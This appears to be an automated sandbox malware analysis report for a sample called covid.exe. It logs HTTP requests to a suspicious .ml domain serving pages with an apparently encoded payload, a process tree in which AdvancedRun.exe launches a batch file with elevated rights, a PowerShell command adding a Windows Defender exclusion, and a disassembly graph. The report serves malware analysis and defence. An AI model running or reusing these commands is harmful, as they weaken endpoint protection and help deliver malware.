                                                                Apr 20, 2021 22:59:11.684930086 CEST532OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A70E3BA9C56C3F44E5DAA4E51EAD00CB.html HTTP/1.1
                                                                UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                Host: mmwrlridbhmibnr.ml
                                                                Connection: Keep-Alive
                                                                Apr 20, 2021 22:59:11.937634945 CEST534INHTTP/1.1 200 OK
                                                                Date: Tue, 20 Apr 2021 20:59:11 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Set-Cookie: __cfduid=def339989e5b144f74108a03997626ea81618952351; expires=Thu, 20-May-21 20:59:11 GMT; path=/; domain=.mmwrlridbhmibnr.ml; HttpOnly; SameSite=Lax
                                                                Last-Modified: Mon, 19 Apr 2021 16:43:45 GMT
                                                                Vary: Accept-Encoding
                                                                X-Frame-Options: SAMEORIGIN
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0992ad87ea00004c61831a9000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=SojOEnCzNZOcpPH9V09NVNMKi30bi5e6KyB4nFY2c8aLPsTGisEWiLNZoO29IbkhzyrdYcOM7hA4Ek3c%2Bd4pVRadrnwGEJy3dL9c0PXzBSaGYu4%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                Server: cloudflare
                                                                CF-RAY: 64314b864a8a4c61-AMS
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                Data Raw: 31 64 33 64 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70
                                                                Data Ascii: 1d3d<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preconnect" href="https://i2-p
                                                                Apr 20, 2021 22:59:11.937678099 CEST535INData Raw: 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 65 6c 69 78 2e 64 61 74 61 2e 74 6d 2d 61 77 78 2e 63 6f 6d 22 3e 3c
                                                                Data Ascii: rod.liverpool.com"><link rel="dns-prefetch" href="https://felix.data.tm-awx.com"><link rel="preconnect" href="https://felix.data.tm-awx.com"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="https://
                                                                Apr 20, 2021 22:59:11.937705040 CEST537INData Raw: 69 6f 6e 73 2f 6c 69 76 65 72 70 6f 6f 6c 2f 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 2f 40 74 72 69 6e 69 74 79 6d
                                                                Data Ascii: ions/liverpool/"><link rel="preload" href="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/webfonts/woff2/SignikaNegative-Bold.47b398e81c9f2e2e.woff2" as="font" crossorigin="crossorigin"><link rel="preload" href="https:/
                                                                Apr 20, 2021 22:59:11.937730074 CEST538INData Raw: 6e 65 73 2d 61 70 70 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 2d 69 64 3d 75 6e 64 65 66 69 6e 65 64 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64
                                                                Data Ascii: nes-app" content="app-id=undefined"><link rel="stylesheet" href="https://s2-prod.liverpool.com/@trinitymirrordigital/article-service/read-next/scss/read-next.css?v=b790533e8e5a70ffa0c2c6c8d118c407"><script type="text/javascript">/*!* $sc
                                                                Apr 20, 2021 22:59:11.937752008 CEST539INData Raw: 2e 6c 61 73 74 43 68 69 6c 64 29 7d 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2c 74 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 2c 6e 3d 22 73 74 72 69 6e 67 22 2c 72 3d 21 31 2c 69 3d 22
                                                                Data Ascii: .lastChild)}var e=document,t=e.getElementsByTagName("head")[0],n="string",r=!1,i="push",s="readyState",o="onreadystatechange",u={},a={},f={},l={},c,h;return v.get=m,v.order=function(e,t,n){(function r(i){i=e.shift(),e.length?v(i,r):v(i,t,n)})(
                                                                Apr 20, 2021 22:59:11.937773943 CEST541INData Raw: 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 63 73 73 6c 6f 61 64 65 72 2e 6d 69 6e 2e 6a 73 2e 6d 61 70 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 5b 5d 3b 0d 0a 3c 2f 73 63 72 69
                                                                Data Ascii: ceMappingURL=cssloader.min.js.map</script><script>window.dataLayer = [];</script><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({"gtm.start":new Date().getTime(),event:"gtm.js"});var f=d.getElementsByTagName(s)[0],j=d.createEleme
                                                                Apr 20, 2021 22:59:11.937797070 CEST541INData Raw: 6f 75 74 20 74 6f 20 63 68 61 6e 67 65 20 2d 20 4c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d
                                                                Data Ascii: out to change - Liverpool.com</title><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="Rhian Brewster was hyped up b
                                                                Apr 20, 2021 22:59:12.198029995 CEST548INData Raw: 37 66 66 39 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 53 53 20 4f 66 20 79 51 51 20 66 20 46 20 66 20 66 20 66 20 51 20 66 20 66 20 66 20 65 78 78 20 65 78 78 20 66 20 66 20 79 43 51 20 66
                                                                Data Ascii: 7ff9<meta name="keywords" content="SS Of yQQ f F f f f Q f f f exx exx f f yCQ f f f f f f f wQ f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f yeC f f f yQ Fy yCw yQ f yCf O efx FF yCQ y Sw efx FF CQ yfQ yfx yyx Fe yye
                                                                Apr 20, 2021 22:59:12.198069096 CEST549INData Raw: 4f 51 20 46 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66
                                                                Data Ascii: OQ F f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f ew Qf yF f f w Qe Qe exQ O f f Qf yyf f f yf Qe Ff e Qf yeC f f yf Qe FC f e Qf yeO f f yf f Qe yww yyx yFf f f yf yeC Q f f Q yyx yFy f f yf yeC x f f Q yy
                                                                Apr 20, 2021 22:59:12.198093891 CEST550INData Raw: 20 79 51 20 46 20 66 20 65 78 51 20 79 46 20 46 20 66 20 65 78 51 20 65 65 20 46 46 20 66 20 66 20 79 20 79 79 79 20 79 46 20 66 20 66 20 79 66 20 51 66 20 79 77 20 66 20 66 20 79 66 20 65 78 51 20 79 51 20 65 20 66 20 65 78 51 20 79 65 20 65 20
                                                                Data Ascii: yQ F f exQ yF F f exQ ee FF f f y yyy yF f f yf Qf yw f f yf exQ yQ e f exQ ye e f Qf yS f f yf FC yyQ yQ yCf F yye exQ ye e f exQ ye y f Qf yw f f yf Qf e f f w Qf yC f f yf f f yyx yO f f yf exQ yQ Q f exQ ye Q f yyy ef f f yf yyQ yQ yCf F
                                                                Apr 20, 2021 22:59:12.198117971 CEST552INData Raw: 79 66 20 4f 77 20 65 78 51 20 79 51 20 66 20 66 20 78 77 20 43 20 66 20 66 20 66 20 51 46 20 77 20 65 78 51 20 65 65 20 78 65 20 66 20 66 20 79 20 65 78 51 20 79 65 20 66 20 66 20 51 65 20 66 20 79 4f 20 51 43 20 79 79 20 66 20 51 43 20 66 20 66
                                                                Data Ascii: yf Ow exQ yQ f f xw C f f f QF w exQ ee xe f f y exQ ye f f Qe f yO QC yy f QC f f f F f f yS yQf Ff f f y f Qf FQ f f yf yyx FC f f yf Fe Fe e f f yyy FO f f yf exQ yQ f f xw C f f f QF w exQ ee xw f f y exQ ye f f Qe eS QC yy f yyF y f f Q f
                                                                Apr 20, 2021 22:59:14.111917019 CEST1897OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8D0E09CE9EC742EC93B6C666F9ACD863.html HTTP/1.1
                                                                UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                Host: mmwrlridbhmibnr.ml
                                                                Apr 20, 2021 22:59:14.335450888 CEST1899INHTTP/1.1 200 OK
                                                                Date: Tue, 20 Apr 2021 20:59:14 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Set-Cookie: __cfduid=d42fb9142b77b1729aa1493c5d642785b1618952354; expires=Thu, 20-May-21 20:59:14 GMT; path=/; domain=.mmwrlridbhmibnr.ml; HttpOnly; SameSite=Lax
                                                                Last-Modified: Mon, 19 Apr 2021 16:43:47 GMT
                                                                Vary: Accept-Encoding
                                                                X-Frame-Options: SAMEORIGIN
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0992ad916500004c61b3360000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=HYSCakQjfwectyu0TrGfii9TUdtoyg%2BiZr73ZnJbZjdPnW7Wzs%2BD%2Bo1IU7nTZp5FGx3vulWIlq3AYfw%2F8WfXWKOU9PPB8oQHT6jqOrfg%2FF0zkOU%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                Server: cloudflare
                                                                CF-RAY: 64314b956d844c61-AMS
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                Data Raw: 62 36 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73
                                                                Data Ascii: b61<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preconnect" href="https


                                                                Code Manipulations

                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                Analysis Process: covid.exe PID: 4912 Parent PID: 5628

                                                                General

                                                                Start time:22:59:09
                                                                Start date:20/04/2021
                                                                Path:C:\Users\user\Desktop\covid.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\covid.exe'
                                                                Imagebase:0x460000
                                                                File size:39624 bytes
                                                                MD5 hash:99E3B458DEE79B33209D39D19692AE08
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:low

                                                                Chronological Activities

                                                                Analysis Process: AdvancedRun.exe PID: 3192 Parent PID: 4912

                                                                General

                                                                Start time:22:59:28
                                                                Start date:20/04/2021
                                                                Path:C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                Imagebase:0x400000
                                                                File size:91000 bytes
                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 3%, Metadefender, Browse
                                                                • Detection: 0%, ReversingLabs
                                                                Reputation:moderate

                                                                Chronological Activities

                                                                Analysis Process: AdvancedRun.exe PID: 5528 Parent PID: 3192

                                                                General

                                                                Start time:22:59:33
                                                                Start date:20/04/2021
                                                                Path:C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /SpecialRun 4101d8 3192
                                                                Imagebase:0x400000
                                                                File size:91000 bytes
                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                Chronological Activities

                                                                Analysis Process: powershell.exe PID: 6176 Parent PID: 4912

                                                                General

                                                                Start time:22:59:38
                                                                Start date:20/04/2021
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
                                                                Imagebase:0xba0000
                                                                File size:430592 bytes
                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:high

                                                                Chronological Activities

                                                                Analysis Process: powershell.exe PID: 6196 Parent PID: 4912

                                                                General

                                                                Start time:22:59:39
                                                                Start date:20/04/2021
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
                                                                Imagebase:0xba0000
                                                                File size:430592 bytes
                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:high

                                                                Chronological Activities

                                                                Analysis Process: conhost.exe PID: 6204 Parent PID: 6176

                                                                General

                                                                Start time:22:59:39
                                                                Start date:20/04/2021
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff774ee0000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Chronological Activities

                                                                Analysis Process: conhost.exe PID: 6212 Parent PID: 6196

                                                                General

                                                                Start time:22:59:39
                                                                Start date:20/04/2021
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff774ee0000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Chronological Activities

                                                                Analysis Process: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe PID: 6224 Parent PID: 4912

                                                                General

                                                                Start time:22:59:39
                                                                Start date:20/04/2021
                                                                Path:C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                Imagebase:0x400000
                                                                File size:91000 bytes
                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 3%, Metadefender, Browse
                                                                • Detection: 0%, ReversingLabs
                                                                Reputation:moderate

                                                                Chronological Activities

                                                                Analysis Process: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe PID: 6640 Parent PID: 6224

                                                                General

                                                                Start time:22:59:52
                                                                Start date:20/04/2021
                                                                Path:C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /SpecialRun 4101d8 6224
                                                                Imagebase:0x400000
                                                                File size:91000 bytes
                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                Chronological Activities

                                                                Disassembly

                                                                Code Analysis

                                                                Reset < >

                                                                  Analysis Process: AdvancedRun.exe PID: 3192 Parent PID: 4912 AdvancedRun.exeCOMMON

                                                                  Execution Graph

                                                                  Execution Coverage:10.9%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:4.1%
                                                                  Total number of Nodes:1983
                                                                  Total number of Limit Nodes:14

                                                                  Graph

                                                                  execution_graph 3613 40a3c1 EnumResourceNamesW 4552 407ec3 4553 407ed9 4552->4553 4554 407eca 4552->4554 4557 405b81 4554->4557 4558 405b8a 4557->4558 4560 405b8f 4557->4560 4574 405adf 4558->4574 4561 405bee 4560->4561 4562 405bbf GetModuleHandleW 4560->4562 4569 405cdb 4560->4569 4564 405c45 4561->4564 4565 405bf8 wcscpy 4561->4565 4563 405c58 LoadStringW 4562->4563 4572 405c63 4563->4572 4580 405ce7 4564->4580 4577 405edd memset _itow 4565->4577 4570 405c1a wcslen 4571 405c2c GetModuleHandleW 4570->4571 4570->4572 4571->4563 4572->4569 4573 405c84 memcpy 4572->4573 4573->4569 4575 405b80 4574->4575 4576 405aec ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 4574->4576 4575->4560 4576->4575 4583 405f39 4577->4583 4579 405c13 4579->4570 4579->4571 4581 405cf0 GetModuleHandleW 4580->4581 4582 405cf7 4580->4582 4581->4582 4582->4563 4584 40b550 4583->4584 4585 405f46 memset GetPrivateProfileStringW 4584->4585 4586 405f92 wcscpy 4585->4586 4587 405fa8 4585->4587 4586->4579 4587->4579 4588 40b644 4591 40b23c 4588->4591 4592 40b216 2 API calls 4591->4592 4593 40b245 4592->4593 3634 40b2c6 3653 40b4d4 3634->3653 3636 40b2d2 GetModuleHandleA 3637 40b2e2 __set_app_type __p__fmode __p__commode 3636->3637 3639 40b376 3637->3639 3640 40b38a 3639->3640 3641 40b37e __setusermatherr 3639->3641 3654 40b4c2 _controlfp 3640->3654 3641->3640 3643 40b38f _initterm __wgetmainargs _initterm 3644 40b3f0 GetStartupInfoW 3643->3644 3645 40b3e2 3643->3645 3647 40b438 GetModuleHandleA 3644->3647 3655 408533 3647->3655 3651 40b468 exit 3652 40b46f _cexit 3651->3652 3652->3645 3653->3636 3654->3643 3656 408543 3655->3656 3714 40313d LoadLibraryW 3656->3714 3658 40854b 3659 40854f 3658->3659 3723 40ac52 3658->3723 3659->3651 3659->3652 3662 408592 3729 4056b5 3662->3729 3669 4085e0 3671 40861f swscanf 3669->3671 3670 40585c _wcsicmp 3679 408658 3670->3679 3762 40584c 3671->3762 3672 408727 3673 40585c _wcsicmp 3672->3673 3675 408735 3673->3675 3677 408823 3675->3677 3685 40875c ExpandEnvironmentStringsW wcschr 3675->3685 3681 402f31 36 API calls 3677->3681 3679->3670 3679->3672 3703 4054b9 free free 3679->3703 3752 402f31 memset 3679->3752 3790 4035fb 3679->3790 3793 4099d4 3679->3793 3796 402fc6 3679->3796 3805 40177c 3679->3805 3818 401d40 3679->3818 3684 408829 3681->3684 3687 40177c 20 API calls 3684->3687 3685->3677 3688 40877f memset memset GetCurrentDirectoryW wcslen wcslen 3685->3688 3690 408855 3687->3690 3691 4087fd wcscpy 3688->3691 3692 4087e8 3688->3692 3695 408895 3690->3695 3697 401d40 220 API calls 3690->3697 3691->3677 3826 404be4 wcscpy 3692->3826 3698 40585c _wcsicmp 3695->3698 3697->3695 3700 4088b1 3698->3700 3701 4088b5 3700->3701 3702 4088bf 3700->3702 3829 4065be memset 3701->3829 3834 406420 memset 3702->3834 3703->3679 3710 408910 6 API calls 3711 4088fd 3710->3711 3712 402f31 36 API calls 3711->3712 3713 408904 CoUninitialize 3712->3713 3715 403190 #17 3714->3715 3716 403168 GetProcAddress 3714->3716 3719 403199 3715->3719 3717 403181 FreeLibrary 3716->3717 3718 403178 3716->3718 3717->3715 3720 40318c 3717->3720 3718->3717 3721 4031a0 MessageBoxW 3719->3721 3722 4031b7 3719->3722 3720->3719 3721->3658 3722->3658 3724 40855e SetErrorMode GetModuleHandleW EnumResourceTypesW 3723->3724 3725 40ac5b 3723->3725 3724->3662 3843 405436 memset 3725->3843 3728 40ac6f GetProcAddress 3728->3724 3857 4054b9 free free 3729->3857 3731 405830 3866 4055d1 3731->3866 3734 405807 3734->3731 3879 40559a 3734->3879 3735 40559a malloc memcpy free free 3742 4056f7 3735->3742 3738 4057a3 free 3738->3742 3741 4054df 7 API calls 3741->3731 3742->3731 3742->3734 3742->3735 3742->3738 3858 404951 3742->3858 3869 4054df wcslen 3742->3869 3743 408f48 3884 408fc9 GetCurrentProcess 3743->3884 3746 408f64 FreeLibrary 3747 4085bd 3746->3747 3748 40585c 3747->3748 3749 405883 3748->3749 3750 405864 3748->3750 3749->3669 3749->3679 3750->3749 3751 40586d _wcsicmp 3750->3751 3751->3749 3751->3750 3911 404ad9 GetModuleFileNameW 3752->3911 3754 402f65 wcsrchr 3755 402f7a 3754->3755 3756 402f7e wcscat 3754->3756 3755->3756 3757 402fa1 3756->3757 3758 402fb2 3756->3758 3912 404923 wcslen 3757->3912 3759 402fc6 30 API calls 3758->3759 3761 402fc2 3759->3761 3761->3679 3763 405851 _wtoi 3762->3763 3764 401ac9 3763->3764 3915 40b550 3764->3915 3767 401af2 3917 40171f 3767->3917 3768 401c15 GetLastError 3770 401c13 3768->3770 3770->3679 3772 401b20 3920 405642 3772->3920 3773 401bf7 GetLastError 3775 401bff CloseHandle 3773->3775 3777 4055d1 free 3775->3777 3776 401b2b memset _snwprintf 3778 4055d1 free 3776->3778 3777->3770 3779 401b82 3778->3779 3780 40559a 4 API calls 3779->3780 3781 401ba0 ReadProcessMemory 3780->3781 3783 401bc8 3781->3783 3925 4055f9 3783->3925 3788 4055d1 free 3789 401bf5 3788->3789 3789->3775 3791 403614 3790->3791 3792 40360a FreeLibrary 3790->3792 3791->3679 3792->3791 3794 4099e1 3793->3794 3795 4099da free 3793->3795 3794->3679 3795->3794 4394 40a0eb wcscpy 3796->4394 3802 40177c 20 API calls 3804 403049 3802->3804 3803 403020 3803->3802 3804->3679 4419 40a0d7 wcscpy 3805->4419 3807 401790 3808 401a29 3807->3808 4420 40a0d7 wcscpy 3807->4420 3808->3679 3810 4019e2 3811 401a04 3810->3811 3815 40135c 13 API calls 3810->3815 4421 401676 3811->4421 3814 401a21 4431 4054b9 free free 3814->4431 3815->3811 3819 401d4c 3818->3819 3825 401d5c 3818->3825 3821 4022d5 210 API calls 3819->3821 3823 401d55 3821->3823 3822 401d90 3822->3679 3824 404baf GetVersionExW 3823->3824 3824->3825 3825->3822 4432 401c26 GetCurrentProcessId memset memset 3825->4432 3827 4047af 2 API calls 3826->3827 3828 404bf6 wcscat 3827->3828 3828->3691 4439 406597 